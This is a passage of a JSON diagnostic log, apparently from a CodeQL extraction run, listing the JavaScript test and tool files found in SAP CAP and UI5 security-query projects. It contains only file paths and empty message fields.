eId":"%SRCROOT%","index":480}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":206}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":342}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":574}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/Component.js","uriBaseId":"%SRCROOT%","index":478}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js","uriBaseId":"%SRCROOT%","index":577}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":170}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.js","uriBaseId":"%SRCROOT%","index":128}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":297}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js","uriBaseId":"%SRCROOT%","index":437}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.js","uriBaseId":"%SRCROOT%","index":244}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":307}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js","uriBaseId":"%SRCROOT%","index":409}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":228}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.js","uriBaseId":"%SRCROOT%","index":339}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":136}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":367}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":541}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/JsonParser/test.js","uriBaseId":"%SRCROOT%","index":249}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":112}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":272}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":538}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.js","uriBaseId":"%SRCROOT%","index":356}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":495}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":221}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":539}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":483}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":537}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":303}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":164}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":573}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":497}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js","uriBaseId":"%SRCROOT%","index":108}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js","uriBaseId":"%SRCROOT%","index":195}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js","uriBaseId":"%SRCROOT%","index":168}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":172}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/server.js","uriBaseId":"%SRCROOT%","index":189}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":505}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":530}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js","uriBaseId":"%SRCROOT%","index":513}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.js","uriBaseId":"%SRCROOT%","index":314}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":295}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":223}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js","uriBaseId":"%SRCROOT%","index":522}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":557}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":209}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":564}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":462}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":528}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure-js-all-sinks/sensitive-exposure-heuristic-source.js","uriBaseId":"%SRCROOT%","index":236}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/.prettierrc.js","uriBaseId":"%SRCROOT%","index":29}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.js","uriBaseId":"%SRCROOT%","index":335}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":213}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/validate-bundle.js","uriBaseId":"%SRCROOT%","index":96}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js","uriBaseId":"%SRCROOT%","index":567}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":233}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.js","uriBaseId":"%SRCROOT%","index":200}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js","uriBaseId":"%SRCROOT%","index":160}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":122}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js","uriBaseId":"%SRCROOT%","index":416}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":374}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":178}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":288}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":391}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js","uriBaseId":"%SRCROOT%","index":118}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":453}}}],"message":{"text":""},"level":"none","des